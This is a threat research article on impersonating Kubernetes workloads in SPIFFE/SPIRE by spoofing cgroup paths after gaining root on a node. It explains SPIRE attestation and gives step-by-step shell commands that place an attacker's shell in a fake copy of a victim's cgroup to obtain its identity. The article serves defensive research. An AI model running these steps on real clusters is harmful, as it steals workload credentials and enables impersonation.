[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/ "Threat Research")
* [Malware](https://unit42.paloaltonetworks.com/category/malware/ "Malware")  
  [Malware](https://unit42.paloaltonetworks.com/category/malware/)

# The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 11 min read  
Related Products  
[![Cortex icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex](https://unit42.paloaltonetworks.com/product-category/cortex/ "Cortex")[![Cortex Cloud icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex Cloud](https://unit42.paloaltonetworks.com/product-category/cortex-cloud/ "Cortex Cloud")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/product-category/cortex-xdr/ "Cortex XDR")[![Cortex XSIAM icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XSIAM](https://unit42.paloaltonetworks.com/product-category/cortex-xsiam/ "Cortex XSIAM")[![Unit 42 Incident Response icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/unit42_RGB_logo_Icon_Color.png)Unit 42 Incident Response](https://unit42.paloaltonetworks.com/product-category/unit-42-incident-response/ "Unit 42 Incident Response")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:
  
  * [Eviatar Garzi](https://unit42.paloaltonetworks.com/author/eviatar-garzi/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:September 10, 2026

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Malware](https://unit42.paloaltonetworks.com/category/malware/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [API](https://unit42.paloaltonetworks.com/tag/api/)
  * [Cryptographic](https://unit42.paloaltonetworks.com/tag/cryptographic/)
  * [JSON](https://unit42.paloaltonetworks.com/tag/json/)
  * [Linux](https://unit42.paloaltonetworks.com/tag/linux/)
  * [Node](https://unit42.paloaltonetworks.com/tag/node/)
  * [SPIFFE](https://unit42.paloaltonetworks.com/tag/spiffe/)
  * [SPIRE](https://unit42.paloaltonetworks.com/tag/spire/)
  * [Spoofing](https://unit42.paloaltonetworks.com/tag/spoofing/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/?pdf=download&lg=en&_wpnonce=04e1ae3768 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/?pdf=print&lg=en&_wpnonce=04e1ae3768 "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=The%20Machine%20With%20Many%20Faces:%20Post-Exploitation%20Identity%20Misuse%20in%20SPIFFE/SPIRE&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fkubernetes-spiffe-spire-identity-spoofing%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fkubernetes-spiffe-spire-identity-spoofing%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fkubernetes-spiffe-spire-identity-spoofing%2F&title=The%20Machine%20With%20Many%20Faces:%20Post-Exploitation%20Identity%20Misuse%20in%20SPIFFE/SPIRE "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fkubernetes-spiffe-spire-identity-spoofing%2F&text=The%20Machine%20With%20Many%20Faces:%20Post-Exploitation%20Identity%20Misuse%20in%20SPIFFE/SPIRE "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fkubernetes-spiffe-spire-identity-spoofing%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=The%20Machine%20With%20Many%20Faces:%20Post-Exploitation%20Identity%20Misuse%20in%20SPIFFE/SPIRE%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fkubernetes-spiffe-spire-identity-spoofing%2F "Share in Mastodon")

## Executive Summary

This research demonstrates post-exploitation techniques that could allow an attacker with root access on a compromised Kubernetes node to misuse an open standard and reference implementation for machine identity known as SPIFFE/SPIRE to impersonate co-located workloads and harvest SPIFFE Verifiable Identity Documents (SVIDs). We show how the trust assumption at the core of every machine-identity system --- that the node is trusted --- collapses once an attacker obtains root on that node. Unit 42 has not observed this technique exploited in the wild.

The Secure Production Identity Framework for Everyone (SPIFFE)/the SPIFFE Runtime Environment (SPIRE) is widely deployed in Kubernetes and cloud-native environments to replace long-lived secrets with short-lived, cryptographically verifiable workload identities.

Our research shows how an attacker with root can spoof the Linux control group (cgroup) information the SPIRE agent uses during workload attestation. This tricks the agent into issuing a co-located workload's SVID to an attacker-controlled process.

As part of this research, we developed [Spooffe](https://github.com/PaloAltoNetworks/spooffe), an open-source tool that defenders can use to test whether an attacker with administrative access could manipulate cgroup metadata to retrieve co-located workload identities and assess the resulting identity area of impact.

When designing threat models for SPIFFE/SPIRE, organizations should assume that root-level access to a node grants access to all cryptographic identities scoped to it. We recommend performing the following activities to reduce exposure:

* Harden nodes
* Restrict root access
* Prohibit privileged containers, host access
* Minimize reliance on weak selectors

Palo Alto Networks customers are better protected from the threats described here through the following products and services:

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?_gl=1*13pmp8e*_ga*NzQyNjM2NzkuMTY2NjY3OTczNw..*_ga_KS2MELEEFC*MTY2OTczNjA2MS4zMS4wLjE2Njk3MzYwNjEuNjAuMC4w) and [XSIAM](https://www.paloaltonetworks.com/resources/datasheets/cortex-xsiam-aag)
* [Cortex Cloud Identity Threat Detection](https://cortex-docs.paloaltonetworks.com/cortex-cloud-runtime-security/cortex-cloud-identity-security/what-is-cortex-cloud-identity-security)

If you think you might have been compromised or have an urgent matter, contact the[Unit 42 Incident Response team](https://start.paloaltonetworks.com/contact-unit42.html).

|----------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| **Related Unit 42 Topics** | **[Identity](https://unit42.paloaltonetworks.com/tag/identity/), [Cloud](https://unit42.paloaltonetworks.com/tag/cloud/), [Kubernetes](https://unit42.paloaltonetworks.com/tag/kubernetes/)** |

## Introduction

[SPIFFE](https://spiffe.io/docs/latest/spiffe-about/overview/) is an open standard for machine identity designed to solve the "Secret Zero" problem --- the challenge of securely introducing the initial secret required to bootstrap trust --- by replacing long-lived secrets with short-lived workload identities. When deployed correctly, SPIFFE enforces strong identity boundaries between workloads.

However, these guarantees rely on a core assumption shared by all identity systems that the underlying node is trusted. If an attacker gains root access to a node, they can interact with identity mechanisms to retrieve all identities authorized to that compromised node.

Our research explores how attackers can exploit root access to harvest workload identities from a compromised node. In this post, we lay the groundwork by explaining machine identity and how SPIFFE establishes and verifies trust in cloud-native environments. We then demonstrate workload impersonation through selector spoofing. Finally, we introduce [Spooffe](https://github.com/PaloAltoNetworks/spooffe), a tool we built to automate the extraction of these workload identities (SVIDs).

Note to readers: If you're already familiar with SPIFFE/SPIRE concepts and architecture, you can jump directly to [Workload Attestation](#workload-attestation) and [How the Agent Attests the Workload](#attests-workload) sections.

## SPIFFE Overview

Consider a scenario where two applications, a frontend and a backend, must communicate securely.

We could generate key pairs and exchange public keys to communicate through Mutual Transport Layer Security (mTLS\*)\*, but this option raises a few key questions:

* Who rotates those keys?
* Who revokes them if the app is compromised?
* Can we verify who/what is presenting the keys?

SPIFFE addresses these issues by standardizing how machines are named and how short-lived credentials are issued.

The term machines refers to two broad categories:

* Workloads: Containers, processes and services running application logic
* Devices: Endpoints such as desktops, mobile devices and internet of things (IoT) or operational technology (OT) systems
  * (Note: Device identity is not part of the core SPIFFE specification)

## SPIFFE Identity Components

Each workload is assigned three identity components:

1. SPIFFE ID: Who you are (your name)
2. SPIFFE Verifiable Identity (SVID)\*\*:\*\*Proof that you are who you are claiming to be (your credentials)
3. Trust Bundle: How others verify that a trusted authority issued your credential

Let's go into a little more detail about each of these.

SPIFFE ID is a canonical name for a workload identity that follows a URI-style format like spiffe://\<trust-domain\>/\<path\> (Figure 1).
![A diagram illustrating a SPIFFE URI. The structure includes three parts: "URI scheme," "trust domain name," and "name or identity of the specific workload". Arrows point from each label to the corresponding parts of the URI.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/word-image-754351-186732-2.png) Figure 1. SPIFFE ID.

The middle part (example\[.\]com) in Figure 1 is the trust domain, the issuer of identity that acts as a security boundary.

In this way, workloads can have an identity and know who to communicate with.

However, identity alone does not guarantee trust or security, so we add the SPIFFE Verifiable Identity Document (SVID). This is a short-lived credential that a workload presents to prove its identity. It is cryptographically signed by the certificate authority (CA) server and always includes the workload's SPIFFE ID.

SVIDs support two primary formats:

* X.509 SVID: A certificate with an embedded public key, typically used for mTLS
* JSON Web Token (JWT) SVID\*\*:\*\* A signed JWT token used as a bearer token for application-level authorization

Finally, we have the trust bundle, which is a set of trust anchors --- root CA certificates or JSON Web Key Sets (JWKS). These are used to verify that a trusted authority issued an SVID within a trust domain.

To understand how these identity components are issued and verified in practice, we first need to look at the SPIRE architecture and its core runtime components.

## SPIRE Architecture

[SPIRE](https://github.com/spiffe/spire) is a production-ready implementation of the SPIFFE specification. While [several](https://spiffe.io/docs/latest/spiffe-about/overview/#open-source-software-that-implements-spiffe) implementations exist, we chose SPIRE for this research because it is widely deployed in Kubernetes environments and fully implements the SPIFFE standard. Furthermore, because SPIRE is open source, we can inspect its internals to understand how the specification works in practice.

SPIRE is composed of a few simple pieces (as shown in Figure 2 below):

![A diagram illustrating SPIFFE/SPIRE architecture. At the top, "CLI Tool" and "API Calls" lead to a "registration API" and "Trust bundle" within a server. Below the server, "Node API" connects to two agents, each with a "WL API." A highlighted entry shows components and related terms.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/word-image-756774-186732-3.png) Figure 2. SPIFFE/SPIRE architecture.

* Workload: A single piece of software deployed to do a specific job (e.g., a process, container, pod)
* SPIRE Server (control plane): This is the CA that stores registration entries. It also issues and cryptographically signs SVIDs. Additionally, it publishes the trust bundle for the trust domain.
* SPIRE Agent: This runs on every compute node (e.g., a Kubernetes node, VM or bare-metal host). It performs the following activities:
  * Accepts requests from workloads locally over the Workload API (UNIX socket)
  * Communicates with the server via the Node API
  * Performs attestation
  * Caches SVIDs
  * Handles rotation
* Registration entries and selectors: These are server-side policy objects that define which workloads are allowed to receive which SPIFFE IDs. When a workload requests an identity, the SPIRE agent collects runtime attributes (selectors) about the workload and the server compares them against registration entries to determine which identity, if any, should be issued.

With the SPIRE architecture in mind, we can now walk through how workload-to-workload identity verification works end to end.

## Workload-to-Workload Identity Verification Flow

When workload A needs to communicate with workload B over mTLS, it requests a short-lived credential from the local SPIRE agent. The agent attests the workload and forwards the attestation data to the SPIFFE server. Based on predefined registration policies, the server selects the appropriate SPIFFE ID for the workload and issues a short-lived X.509 SVID.

The server also publishes the corresponding public keys as part of the trust bundle.

When workload A initiates a connection, it presents its SVID during the mTLS handshake. Workload B verifies the SVID by validating the signature against the trust bundle, checking the certificate's expiration, and confirming that the SPIFFE ID matches an expected identity.

If these checks succeed, workload B can cryptographically authenticate workload A and establish a secure connection. This enables workload-to-workload communication based on identity rather than long-lived secrets (Figure 3).
![A diagram depicting a process flow between two workloads, A and B, using secure communication. Workload A signs data with a server's private key, creating an SVID (X.509) that includes a public key. This information is verified by Workload B using a trust bundle. The process includes verification and the exchange of digital certificates via an endpoint. The visual features robots and padlock icons to represent processes and security.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/word-image-759438-186732-4.png) Figure 3. Workload communication.

The identity flow described above depends on attestation, the process by which SPIRE determines whether a workload is allowed to receive an identity. SPIRE performs attestation at two levels:

1. Node attestation establishes trust in the agent running on a node
2. Workload attestation determines the identity of individual workloads

In this post, we focus on workload attestation, as it is the mechanism directly involved in selector evaluation and the attacks discussed later.

## Workload Attestation

Before the agent attests the workloads, the SPIRE server's administrator must register the workload selectors in the SPIRE server so it can later compare them to the selectors in the agent.  
Shell  
$ kubectl exec -n spire spire-server-0 -- \\ /opt/spire/bin/spire-server entry create \\ -spiffeID spiffe://example\[.\]org/ns/default/sa/default \\ -parentID spiffe://example\[.\]org/ns/spire/sa/spire-agent \\ -selector k8s:ns:default \\ -selector k8s:sa:default

|-------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 | $ kubectl exec -n spire spire-server-0 -- \\ /opt/spire/bin/spire-server entry create \\ -spiffeID spiffe://example\[.\]org/ns/default/sa/default \\ -parentID spiffe://example\[.\]org/ns/spire/sa/spire-agent \\ -selector k8s:ns:default \\ -selector k8s:sa:default |

In this Kubernetes example, the registration entry authorizes any pod running in the default namespace and using the default service account to receive the specified SPIFFE identity (spiffeID).

The resulting record is stored on the SPIRE server as follows:  
Shell  
$ kubectl exec -n spire spire-server-0 -- /opt/spire/bin/spire-server entry show Found 1 entries Entry ID : f08ef054-053d-4013-ac7e-8fbc945ab5a1 SPIFFE ID : spiffe://example\[.\]org/ns/default/sa/default Parent ID : spiffe://example\[.\]org/ns/spire/sa/spire-agent Revision : 0 X509-SVID TTL : default JWT-SVID TTL : default Selector : k8s:ns:default Selector : k8s:sa:default

|----------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 | $ kubectl exec -n spire spire-server-0 -- /opt/spire/bin/spire-server entry show Found 1 entries Entry ID : f08ef054-053d-4013-ac7e-8fbc945ab5a1 SPIFFE ID : spiffe://example\[.\]org/ns/default/sa/default Parent ID : spiffe://example\[.\]org/ns/spire/sa/spire-agent Revision : 0 X509-SVID TTL : default JWT-SVID TTL : default Selector : k8s:ns:default Selector : k8s:sa:default |

The SPIRE agent periodically synchronizes and caches these registration entries from the server, using them locally during workload attestation to determine which identity applies. The agent generates key pairs for each registration entry, sends certificate signing requests (CSRs) to the server and caches the resulting SVIDs.

When a workload wants to authenticate, it requests an identity from the agent over the Workload API (Figure 4, step 1). The agent performs workload attestation (Figure 4, step 2) by gathering selectors from the workload process and matching them against cached registration entries.

Upon a successful match (Figure 4, step 3), the agent returns:

* X.509 SVID
* Private key
* Trust bundle

**Note:** This example is based on an X.509 SVID request. For JWT SVID requests, the agent returns only a signed JWT token.
![A diagram titled "Workload Attestation" illustrating the process flow. "Workload A" connects to "kubelet" and "Linux" components, then to "k8s" and "UNIX," leading to the "Agent." The "Agent" includes "Workload Attestor" and connects to the "Workload API." Cached entries and SVIDs are shown. The process is numbered 1 to 3, showing the flow of requests and responses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/word-image-761797-186732-5.png) Figure 4. Workload attestation.

With the high-level flow in mind, we can now examine how attestation works in practice.

## How the Agent Attests the Workload

When a workload requests an SVID (via [FetchJWTSVID](https://github.com/spiffe/spire/blob/e904ad991fe671c5a372251aa89a886d8474e876/pkg/agent/endpoints/workload/handler.go#L65) or [FetchX509SVID](https://github.com/spiffe/spire/blob/e904ad991fe671c5a372251aa89a886d8474e876/pkg/agent/endpoints/workload/handler.go#L214)), it connects to the agent Workload API, typically via a Unix domain socket (such as /run/spire/sockets/agent.sock). The agent then [extracts](https://github.com/spiffe/spire/blob/e904ad991fe671c5a372251aa89a886d8474e876/pkg/common/peertracker/uds_linux.go#L9-L22) the PID for the calling process.

Once the agent receives the PID, it passes it to the configured workload attestor plugins, which collect selectors based on process and container metadata. SPIRE agents support several workload-attestor plugins. Common plugins include docker, k8s, systemd, Unix and Windows. In our cluster, the agent uses the [k8s](https://github.com/spiffe/spire/blob/e904ad991fe671c5a372251aa89a886d8474e876/pkg/agent/plugin/workloadattestor/k8s/k8s.go) and [Unix](https://github.com/spiffe/spire/blob/e904ad991fe671c5a372251aa89a886d8474e876/pkg/agent/plugin/workloadattestor/unix/unix_posix.go) plugins.

### Kubernetes Plugin (k8s)

The k8s plugin uses the workload PID to access /proc/\<pid\>/mountinfo or /proc/\<pid\>/cgroups. It calls [GetPodUIDAndContainerID](https://github.com/spiffe/spire/blob/e904ad991fe671c5a372251aa89a886d8474e876/pkg/agent/plugin/workloadattestor/k8s/k8s_posix.go#L58C27-L58C50) to extract the pod UID and the container ID. In our environment, this process looks like the following:  
Shell

# via /proc/\<pid\>/mountinfo 4866 4865 0:29 /kubepods.slice/kubepods-besteffort.slice/kubepods-besteffort-pod\<pod\_uid\>.slice/cri-containerd-\<container\_id\>.scope /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw \# via /proc/\<pid\>/cgroups 0::/kubepods.slice/kubepods-besteffort.slice/kubepods-besteffort-pod\<pod\_uid\>.slice/cri-containerd-\<container\_id\>.scope

|-----------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 | # via /proc/\<pid\>/mountinfo 4866 4865 0:29 /kubepods.slice/kubepods-besteffort.slice/kubepods-besteffort-pod\<pod\_uid\>.slice/cri-containerd-\<container\_id\>.scope /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw # via /proc/\<pid\>/cgroups 0::/kubepods.slice/kubepods-besteffort.slice/kubepods-besteffort-pod\<pod\_uid\>.slice/cri-containerd-\<container\_id\>.scope |

After extracting the container ID and pod UID, the k8s plugin queries the kubelet to retrieve pod metadata. To do this, it uses the SPIRE agent's service account token, stored at /var/run/secrets/kubernetes.io/serviceaccount/token.

The agent's service account has the following permissions, which allow it to list pods and access node information:  
kind: ClusterRole metadata: ... name: spire-agent-cluster-role ... rules: - apiGroups: - "" resources: - pods - nodes - nodes/proxy verbs: - get

|----------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 | kind: ClusterRole metadata: ... name: spire-agent-cluster-role ... rules: - apiGroups: - "" resources: - pods - nodes - nodes/proxy verbs: - get |

Using this token, the plugin calls [getPodList](https://github.com/spiffe/spire/blob/e904ad991fe671c5a372251aa89a886d8474e876/pkg/agent/plugin/workloadattestor/k8s/k8s.go#L321) to retrieve all pods on the node. It then identifies the pod whose UID and container ID match the values extracted from the /proc directory. Once matched, it [collects selectors](https://github.com/spiffe/spire/blob/e904ad991fe671c5a372251aa89a886d8474e876/pkg/agent/plugin/workloadattestor/k8s/k8s.go#L799) from the pod's metadata:  
Shell  
type:\\"k8s\\" value:\\"sa:default\\" type:\\"k8s\\" value:\\"ns:default\\" type:\\"k8s\\" value:\\"node-name:mars\\" type:\\"k8s\\" value:\\"pod-uid:0f3f57b3-a05c-4316-84e6-f88f0639e120\\" type:\\"k8s\\" value:\\"pod-name:client-845647cfb-s9stv\\" type:\\"k8s\\" value:\\"pod-image-count:1\\" type:\\"k8s\\" value:\\"pod-init-image-count:0\\" type:\\"k8s\\" value:\\"pod-image:ghcr.io/spiffe/spire-agent:1.5.1\\" type:\\"k8s\\" value:\\"pod-image:ghcr.io/spiffe/spire-agent@sha256:40228af4d9a094f0fef2d7a303a3b6a689c4b4eba2fa9f7da5125b81d2d68ec8\\" type:\\"k8s\\" value:\\"pod-label:app:client\\" type:\\"k8s\\" value:\\"pod-label:pod-template-hash:845647cfb\\" type:\\"k8s\\" value:\\"pod-owner:ReplicaSet:client-845647cfb\\" type:\\"k8s\\" value:\\"pod-owner-uid:ReplicaSet:47b494e3-2758-4b2a-82f8-5e924700f6bb\\" type:\\"k8s\\" value:\\"container-name:client\\" type:\\"k8s\\" value:\\"container-image:ghcr.io/spiffe/spire-agent:1.5.1\\" type:\\"k8s\\" value:\\"container-image:ghcr.io/spiffe/spire-agent@sha256:40228af4d9a094f0fef2d7a303a3b6a689c4b4eba2fa9f7da5125b81d2d68ec8\\"

|----------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | type:\\"k8s\\" value:\\"sa:default\\" type:\\"k8s\\" value:\\"ns:default\\" type:\\"k8s\\" value:\\"node-name:mars\\" type:\\"k8s\\" value:\\"pod-uid:0f3f57b3-a05c-4316-84e6-f88f0639e120\\" type:\\"k8s\\" value:\\"pod-name:client-845647cfb-s9stv\\" type:\\"k8s\\" value:\\"pod-image-count:1\\" type:\\"k8s\\" value:\\"pod-init-image-count:0\\" type:\\"k8s\\" value:\\"pod-image:ghcr.io/spiffe/spire-agent:1.5.1\\" type:\\"k8s\\" value:\\"pod-image:ghcr.io/spiffe/spire-agent@sha256:40228af4d9a094f0fef2d7a303a3b6a689c4b4eba2fa9f7da5125b81d2d68ec8\\" type:\\"k8s\\" value:\\"pod-label:app:client\\" type:\\"k8s\\" value:\\"pod-label:pod-template-hash:845647cfb\\" type:\\"k8s\\" value:\\"pod-owner:ReplicaSet:client-845647cfb\\" type:\\"k8s\\" value:\\"pod-owner-uid:ReplicaSet:47b494e3-2758-4b2a-82f8-5e924700f6bb\\" type:\\"k8s\\" value:\\"container-name:client\\" type:\\"k8s\\" value:\\"container-image:ghcr.io/spiffe/spire-agent:1.5.1\\" type:\\"k8s\\" value:\\"container-image:ghcr.io/spiffe/spire-agent@sha256:40228af4d9a094f0fef2d7a303a3b6a689c4b4eba2fa9f7da5125b81d2d68ec8\\" |

### Unix Plugin

The Unix plugin gathers information from /proc to produce selectors such as user identifier (UID) and group identifier (GID). These selectors are used during workload attestation to bind a workload's identity to operating system level properties of the calling process, helping SPIRE distinguish between different workloads running on the same node.

Here is an example of the selectors it [collects](https://github.com/spiffe/spire/blob/e904ad991fe671c5a372251aa89a886d8474e876/pkg/agent/plugin/workloadattestor/unix/unix_posix.go#L146-L201):  
Shell  
type:\\"unix\\" value:\\"uid:0\\" type:\\"unix\\" value:\\"gid:0\\" type:\\"unix\\" value:\\"supplementary\_gid:0\\"

|-------|---------------------------------------------------------------------------------------------------------------------|
| 1 2 3 | type:\\"unix\\" value:\\"uid:0\\" type:\\"unix\\" value:\\"gid:0\\" type:\\"unix\\" value:\\"supplementary\_gid:0\\" |

The agent combines these selectors from both the k8s and Unix plugins. It then matches this selector set against the locally cached registration entries. If an entry's selectors are a subset of the workload's selectors, the agent returns the corresponding cached SVID to the workload.

## Workload Impersonation: Selector Spoofing via Cgroup

This attack requires root-level access to the node. Our analysis revealed that workload attestation relies heavily on the workload's cgroup path. An attacker with root access on the node can manipulate this cgroup path, potentially tricking the agent into believing the attestation claims belong to a different workload and obtain that workload's identity. This could allow the attacker to impersonate the victim workload and access any services or resources trusted under that identity.

As a first step, we created a registration entry for a pod named workload-a in the server and we verified that we could fetch its identity from the pod:  
Shell  
Entry ID : 5400287f-a2b1-4347-9480-17d9da67f203 SPIFFE ID : spiffe://example\[.\]org/ns/a/sa/a Parent ID : spiffe://example\[.\]org/ns/spire/sa/spire-agent Revision : 0 X509-SVID TTL : default JWT-SVID TTL : default Selector : k8s:ns:a Selector : k8s:sa:default

|-----------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 | Entry ID : 5400287f-a2b1-4347-9480-17d9da67f203 SPIFFE ID : spiffe://example\[.\]org/ns/a/sa/a Parent ID : spiffe://example\[.\]org/ns/spire/sa/spire-agent Revision : 0 X509-SVID TTL : default JWT-SVID TTL : default Selector : k8s:ns:a Selector : k8s:sa:default |

We verified that we could not retrieve this identity from the host by requesting a JWT SVID:  
Shell  
newton@mars:~$ /opt/spire/bin/spire-agent-1.12.4 api fetch jwt -audience my-service -socketPath /run/spire/sockets/agent.sock rpc error: code = PermissionDenied desc = no identity issued

|-----|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 | newton@mars:~$ /opt/spire/bin/spire-agent-1.12.4 api fetch jwt -audience my-service -socketPath /run/spire/sockets/agent.sock rpc error: code = PermissionDenied desc = no identity issued |

To spoof the workload-a cgroup, we first retrieve its PID:  
Shell  
$ sudo crictl inspect $(sudo crictl ps -a 2\>/dev/null | awk '/Running/ \&\& $0 ~ /(^|\[\[:space:\]\])workload-a(\[\[:space:\]\]|$)/ {print $1}') 2\>/dev/null | jq '.info.pid' 9072

|-----|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 | $ sudo crictl inspect $(sudo crictl ps -a 2\>/dev/null | awk '/Running/ \&\& $0 ~ /(^|\[\[:space:\]\])workload-a(\[\[:space:\]\]|$)/ {print $1}') 2\>/dev/null | jq '.info.pid' 9072 |

We checked its cgroup path based on the above PID:  
Shell  
$ cat /proc/9072/cgroup 0::/kubepods.slice/kubepods-besteffort.slice/kubepods-besteffort-pod7e3ad176\_ab5c\_4f2a\_b5f3\_3c7e4c91a9ca.slice/cri-containerd-7e1e73513947053f6ee40746fc498b1fb4f285cf175fa8336f08a38e209bda38.scope

|-----|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 | $ cat /proc/9072/cgroup 0::/kubepods.slice/kubepods-besteffort.slice/kubepods-besteffort-pod7e3ad176\_ab5c\_4f2a\_b5f3\_3c7e4c91a9ca.slice/cri-containerd-7e1e73513947053f6ee40746fc498b1fb4f285cf175fa8336f08a38e209bda38.scope |

We copied this path to a mock cgroup path and wrote our shell's current PID($$) into the mock cgroup's cgroup.procs file:  
Shell  
$ sudo mkdir -p /sys/fs/cgroup/kubepods-besteffort.slice.FAKE/kubepods-besteffort-pod7e3ad176\_ab5c\_4f2a\_b5f3\_3c7e4c91a9ca.slice/cri-containerd-7e1e73513947053f6ee40746fc498b1fb4f285cf175fa8336f08a38e209bda38.scope $ sudo echo $$ | sudo tee /sys/fs/cgroup/kubepods-besteffort.slice.FAKE/kubepods-besteffort-pod7e3ad176\_ab5c\_4f2a\_b5f3\_3c7e4c91a9ca.slice/cri-containerd-7e1e73513947053f6ee40746fc498b1fb4f285cf175fa8336f08a38e209bda38.scope/cgroup.procs 169614

|---------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 | $ sudo mkdir -p /sys/fs/cgroup/kubepods-besteffort.slice.FAKE/kubepods-besteffort-pod7e3ad176\_ab5c\_4f2a\_b5f3\_3c7e4c91a9ca.slice/cri-containerd-7e1e73513947053f6ee40746fc498b1fb4f285cf175fa8336f08a38e209bda38.scope $ sudo echo $$ | sudo tee /sys/fs/cgroup/kubepods-besteffort.slice.FAKE/kubepods-besteffort-pod7e3ad176\_ab5c\_4f2a\_b5f3\_3c7e4c91a9ca.slice/cri-containerd-7e1e73513947053f6ee40746fc498b1fb4f285cf175fa8336f08a38e209bda38.scope/cgroup.procs 169614 |

Notably, writing the PID directly into the original cgroup path would have also worked. We used a separate cgroup only to avoid modifying the original workload's runtime state.

Running the fetch command again successfully retrieved the identity associated with PID 9072:  
Shell  
